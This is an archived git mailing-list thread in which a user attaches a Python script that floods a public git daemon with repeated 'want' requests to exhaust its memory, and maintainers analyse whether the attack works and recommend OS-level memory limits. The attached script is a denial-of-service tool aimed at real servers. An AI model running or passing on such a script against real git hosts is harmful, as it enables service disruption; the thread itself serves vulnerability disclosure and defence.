arbitrary memory allocation

git.vger.kernel.org archive mirror
 help / color / mirror / Atom feed

* arbitrary memory allocation
@ 2015-11-26  4:06 ytrezq
  2015-12-01  0:17 ` Junio C Hamano
  2015-12-02  6:09 ` Jeff King
  0 siblings, 2 replies; 4+ messages in thread
From: ytrezq @ 2015-11-26  4:06 UTC (permalink / raw)
  To: git

[-- Attachment #1: Type: text/plain, Size: 187 bytes --]

Hello,

First, something I still don t understand, should I always ulimit ram
usage for security purposes when I m manage a public server?

If not, you may find the attachment interesting

[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #2: git-clone.py --]
[-- Type: text/x-python; name="git-clone.py", Size: 2736 bytes --]

#!/usr/bin/python
from socket import *
import sys,time
if len(sys.argv)!=3:
	print "Ok, it is not a real memory leak but it can be used against any public git server.\nAn http version of this script would benefit from a large zlib compression ratio allowing to fill the ram 200 time faster like with ssh"
	print ""
	print "usage"
	print "argv1 is the target domain name or address"
	print "argv2 is the path to a non empty repo with at least 2 refs"
	print ""
	print "for example git://somesite.com/git/linux.git would become"
	print sys.argv[0] + " somesite.com /git/linux.git"
	exit(1)

sockobj = socket(AF_INET, SOCK_STREAM)
sockobj.connect((sys.argv[1],9418))
path="git-upload-pack "+sys.argv[2]+"\0host="+sys.argv[1]+'\0' # request a clone
sockobj.send(format(len(path)+4,'04x')+path) # see the git documentation for more information about the pkt-line format

# Even when blocking, socket.recv might not send the complete request size
def full_read(length):
	buf=sockobj.recv(length)
	size=length-len(buf)
	while size>0:
		time.sleep(0.001) # wait for data to arrive
		buf+=sockobj.recv(size)
		size=size-len(buf)
	return buf

obj=[full_read(int(full_read(4),16)-4)]
pkt_line_length=int(sockobj.recv(4),16)-4 # represent the lenght of a packet in pkt-line format (in hex on 4 ascii bytes)
while pkt_line_length>0:
	obj.append(full_read(pkt_line_length))
	pkt_line_length=int(full_read(4),16)-4
	if sys.getsizeof(obj)>150000: # Don t do the same error of the official git project, limit our ram usage
		time.sleep(1)
		sockobj.recv(10000) # be sure git-upload-pack would be ready for recieving
		break

first_line="want "+obj[0][:40]+" multi_ack_detailed side-band-64k thin-pack ofs-delta agent=git/2.9.2\n" # The first line have a different format
sockobj.send(format(len(first_line)+4,'04x')+first_line) # send it in the pkt-line format

line_list="0032want "+obj[1][:40]+'\n'
while len(line_list)<65430: # Get the ideal tcp packet size for fastest bandwidth (64Ko)
	for i in obj:
		if (i==obj[0]) or (i==obj[1]) or ("pull" in i):
			continue
		line_list+="0032want "+i[:40]+'\n'
		if len(line_list)>65480:
			break


# struct object (see object.h line 47)
# unsigned int
# unsigned int
# unsigned int
# unsigned int
# unsigned char binary_sha[20]

# objects=object +
# char *=NULL (64 bit int)
# char *=NULL (64 bit int)
# unsigned mode
line_list_len=line_list.count('\n')*56 # Line lengths of the pkt-line format won t fill the ram, so remove them from the size counter
count=line_list_len
while True:
	sys.stdout.flush()
	sockobj.send(line_list) # for each line, the git-send-pack process allocate append a member to a struct objects array
	print("\r%.2f Mo of ram filled" % float(count/float(1048576))),
	count+=line_list_len

^ permalink raw reply	[flat|nested] 4+ messages in thread

* Re: arbitrary memory allocation
  2015-11-26  4:06 arbitrary memory allocation ytrezq
@ 2015-12-01  0:17 ` Junio C Hamano
  2015-12-01  1:03   ` Stefan Beller
  2015-12-02  6:09 ` Jeff King
  1 sibling, 1 reply; 4+ messages in thread
From: Junio C Hamano @ 2015-12-01  0:17 UTC (permalink / raw)
  To: ytrezq; +Cc: git

ytrezq@sdf-eu.org writes:

> line_list="0032want "+obj[1][:40]+'\n'
> while len(line_list)<65430: # Get the ideal tcp packet size for fastest bandwidth (64Ko)
> 	for i in obj:
> 		if (i==obj[0]) or (i==obj[1]) or ("pull" in i):
> 			continue
> 		line_list+="0032want "+i[:40]+'\n'
> 		if len(line_list)>65480:
> 			break
> ...
> line_list_len=line_list.count('\n')*56 # Line lengths of the pkt-line format won t fill the ram, so remove them from the size counter
> count=line_list_len
> while True:
> 	sys.stdout.flush()
> 	sockobj.send(line_list) # for each line, the git-send-pack process allocate append a member to a struct objects array
> 	print("\r%.2f Mo of ram filled" % float(count/float(1048576))),
> 	count+=line_list_len

This seems to be attempting to throw "want XXXXXXXX" that are
outside the original server-side advertisement over and over.  Even
though the set of distinct "want" lines you can throw at the server
is bounded by the server-side advertisement (i.e. usually you won't
be able to throw an object name that does not appear at the tip), by
repeating the requests, you seem to be hoping that you can exhaust
the object_array() used in upload-pack.c::receive_needs().

But does that attack actually work?  After seeing these "want"
lines, the object name read from there goes through this code:

		o = parse_object(sha1_buf);
		if (!o)
			die("git upload-pack: not our ref %s",
			    sha1_to_hex(sha1_buf));
		if (!(o->flags & WANTED)) {
			o->flags |= WANTED;
			if (!is_our_ref(o))
				has_non_tip = 1;
			add_object_array(o, NULL, &want_obj);
		}

So it appears to me that the requests the code makes in the second
and subsequent iterations of "while True:" loop would merely be an
expensive no-op, without bloating memory footprint.

It does waste CPU cycle and network socket, though.

^ permalink raw reply	[flat|nested] 4+ messages in thread

* Re: arbitrary memory allocation
  2015-12-01  0:17 ` Junio C Hamano
@ 2015-12-01  1:03   ` Stefan Beller
  0 siblings, 0 replies; 4+ messages in thread
From: Stefan Beller @ 2015-12-01  1:03 UTC (permalink / raw)
  To: Junio C Hamano; +Cc: ytrezq, git@vger.kernel.org

On Mon, Nov 30, 2015 at 4:17 PM, Junio C Hamano <gitster@pobox.com> wrote:
> ytrezq@sdf-eu.org writes:
>
>> line_list="0032want "+obj[1][:40]+'\n'
>> while len(line_list)<65430: # Get the ideal tcp packet size for fastest bandwidth (64Ko)
>>       for i in obj:
>>               if (i==obj[0]) or (i==obj[1]) or ("pull" in i):
>>                       continue
>>               line_list+="0032want "+i[:40]+'\n'
>>               if len(line_list)>65480:
>>                       break
>> ...
>> line_list_len=line_list.count('\n')*56 # Line lengths of the pkt-line format won t fill the ram, so remove them from the size counter
>> count=line_list_len
>> while True:
>>       sys.stdout.flush()
>>       sockobj.send(line_list) # for each line, the git-send-pack process allocate append a member to a struct objects array
>>       print("\r%.2f Mo of ram filled" % float(count/float(1048576))),
>>       count+=line_list_len
>
> This seems to be attempting to throw "want XXXXXXXX" that are
> outside the original server-side advertisement over and over.  Even
> though the set of distinct "want" lines you can throw at the server
> is bounded by the server-side advertisement (i.e. usually you won't
> be able to throw an object name that does not appear at the tip), by
> repeating the requests, you seem to be hoping that you can exhaust
> the object_array() used in upload-pack.c::receive_needs().
>
> But does that attack actually work?  After seeing these "want"
> lines, the object name read from there goes through this code:
>
>                 o = parse_object(sha1_buf);
>                 if (!o)
>                         die("git upload-pack: not our ref %s",
>                             sha1_to_hex(sha1_buf));
>                 if (!(o->flags & WANTED)) {
>                         o->flags |= WANTED;
>                         if (!is_our_ref(o))
>                                 has_non_tip = 1;
>                         add_object_array(o, NULL, &want_obj);

(Looking quickly), I do not see a deduplication in add_object_array,
so you could send the same want line again and again,
to inflate the want_obj array.

If you happen to know a large object in a well known project
(some linux blob maybe?), it would be held a lots of times in memory,
which may trigger the OOM killer in linux?

>                 }
>
> So it appears to me that the requests the code makes in the second
> and subsequent iterations of "while True:" loop would merely be an
> expensive no-op, without bloating memory footprint.
>
> It does waste CPU cycle and network socket, though.
>
> --
> To unsubscribe from this list: send the line "unsubscribe git" in
> the body of a message to majordomo@vger.kernel.org
> More majordomo info at  http://vger.kernel.org/majordomo-info.html

^ permalink raw reply	[flat|nested] 4+ messages in thread

* Re: arbitrary memory allocation
  2015-11-26  4:06 arbitrary memory allocation ytrezq
  2015-12-01  0:17 ` Junio C Hamano
@ 2015-12-02  6:09 ` Jeff King
  1 sibling, 0 replies; 4+ messages in thread
From: Jeff King @ 2015-12-02  6:09 UTC (permalink / raw)
  To: ytrezq; +Cc: git

On Thu, Nov 26, 2015 at 05:06:35AM +0100, ytrezq@sdf-eu.org wrote:

> First, something I still don t understand, should I always ulimit ram
> usage for security purposes when I m manage a public server?

You didn't define "public" here. For serving fetches, the memory tends
to be fairly bounded and dependent on the repo you're serving. For
accepting pushes, it's trivial to convince the server to allocate a lot
of memory (you can send an unbounded set of ref updates, or you can
simply send a 50GB object that compresses down to a tiny size).

Git does not have any internal memory controls, and will generally rely
on malloc() to tell it when it is not being reasonable. I'd suggest
using OS-level memory controls like cgroups if you're hosting something
public.

-Peff

^ permalink raw reply	[flat|nested] 4+ messages in thread

end of thread, other threads:[~2015-12-02  6:09 UTC | newest]

Thread overview: 4+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2015-11-26  4:06 arbitrary memory allocation ytrezq
2015-12-01  0:17 ` Junio C Hamano
2015-12-01  1:03   ` Stefan Beller
2015-12-02  6:09 ` Jeff King

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).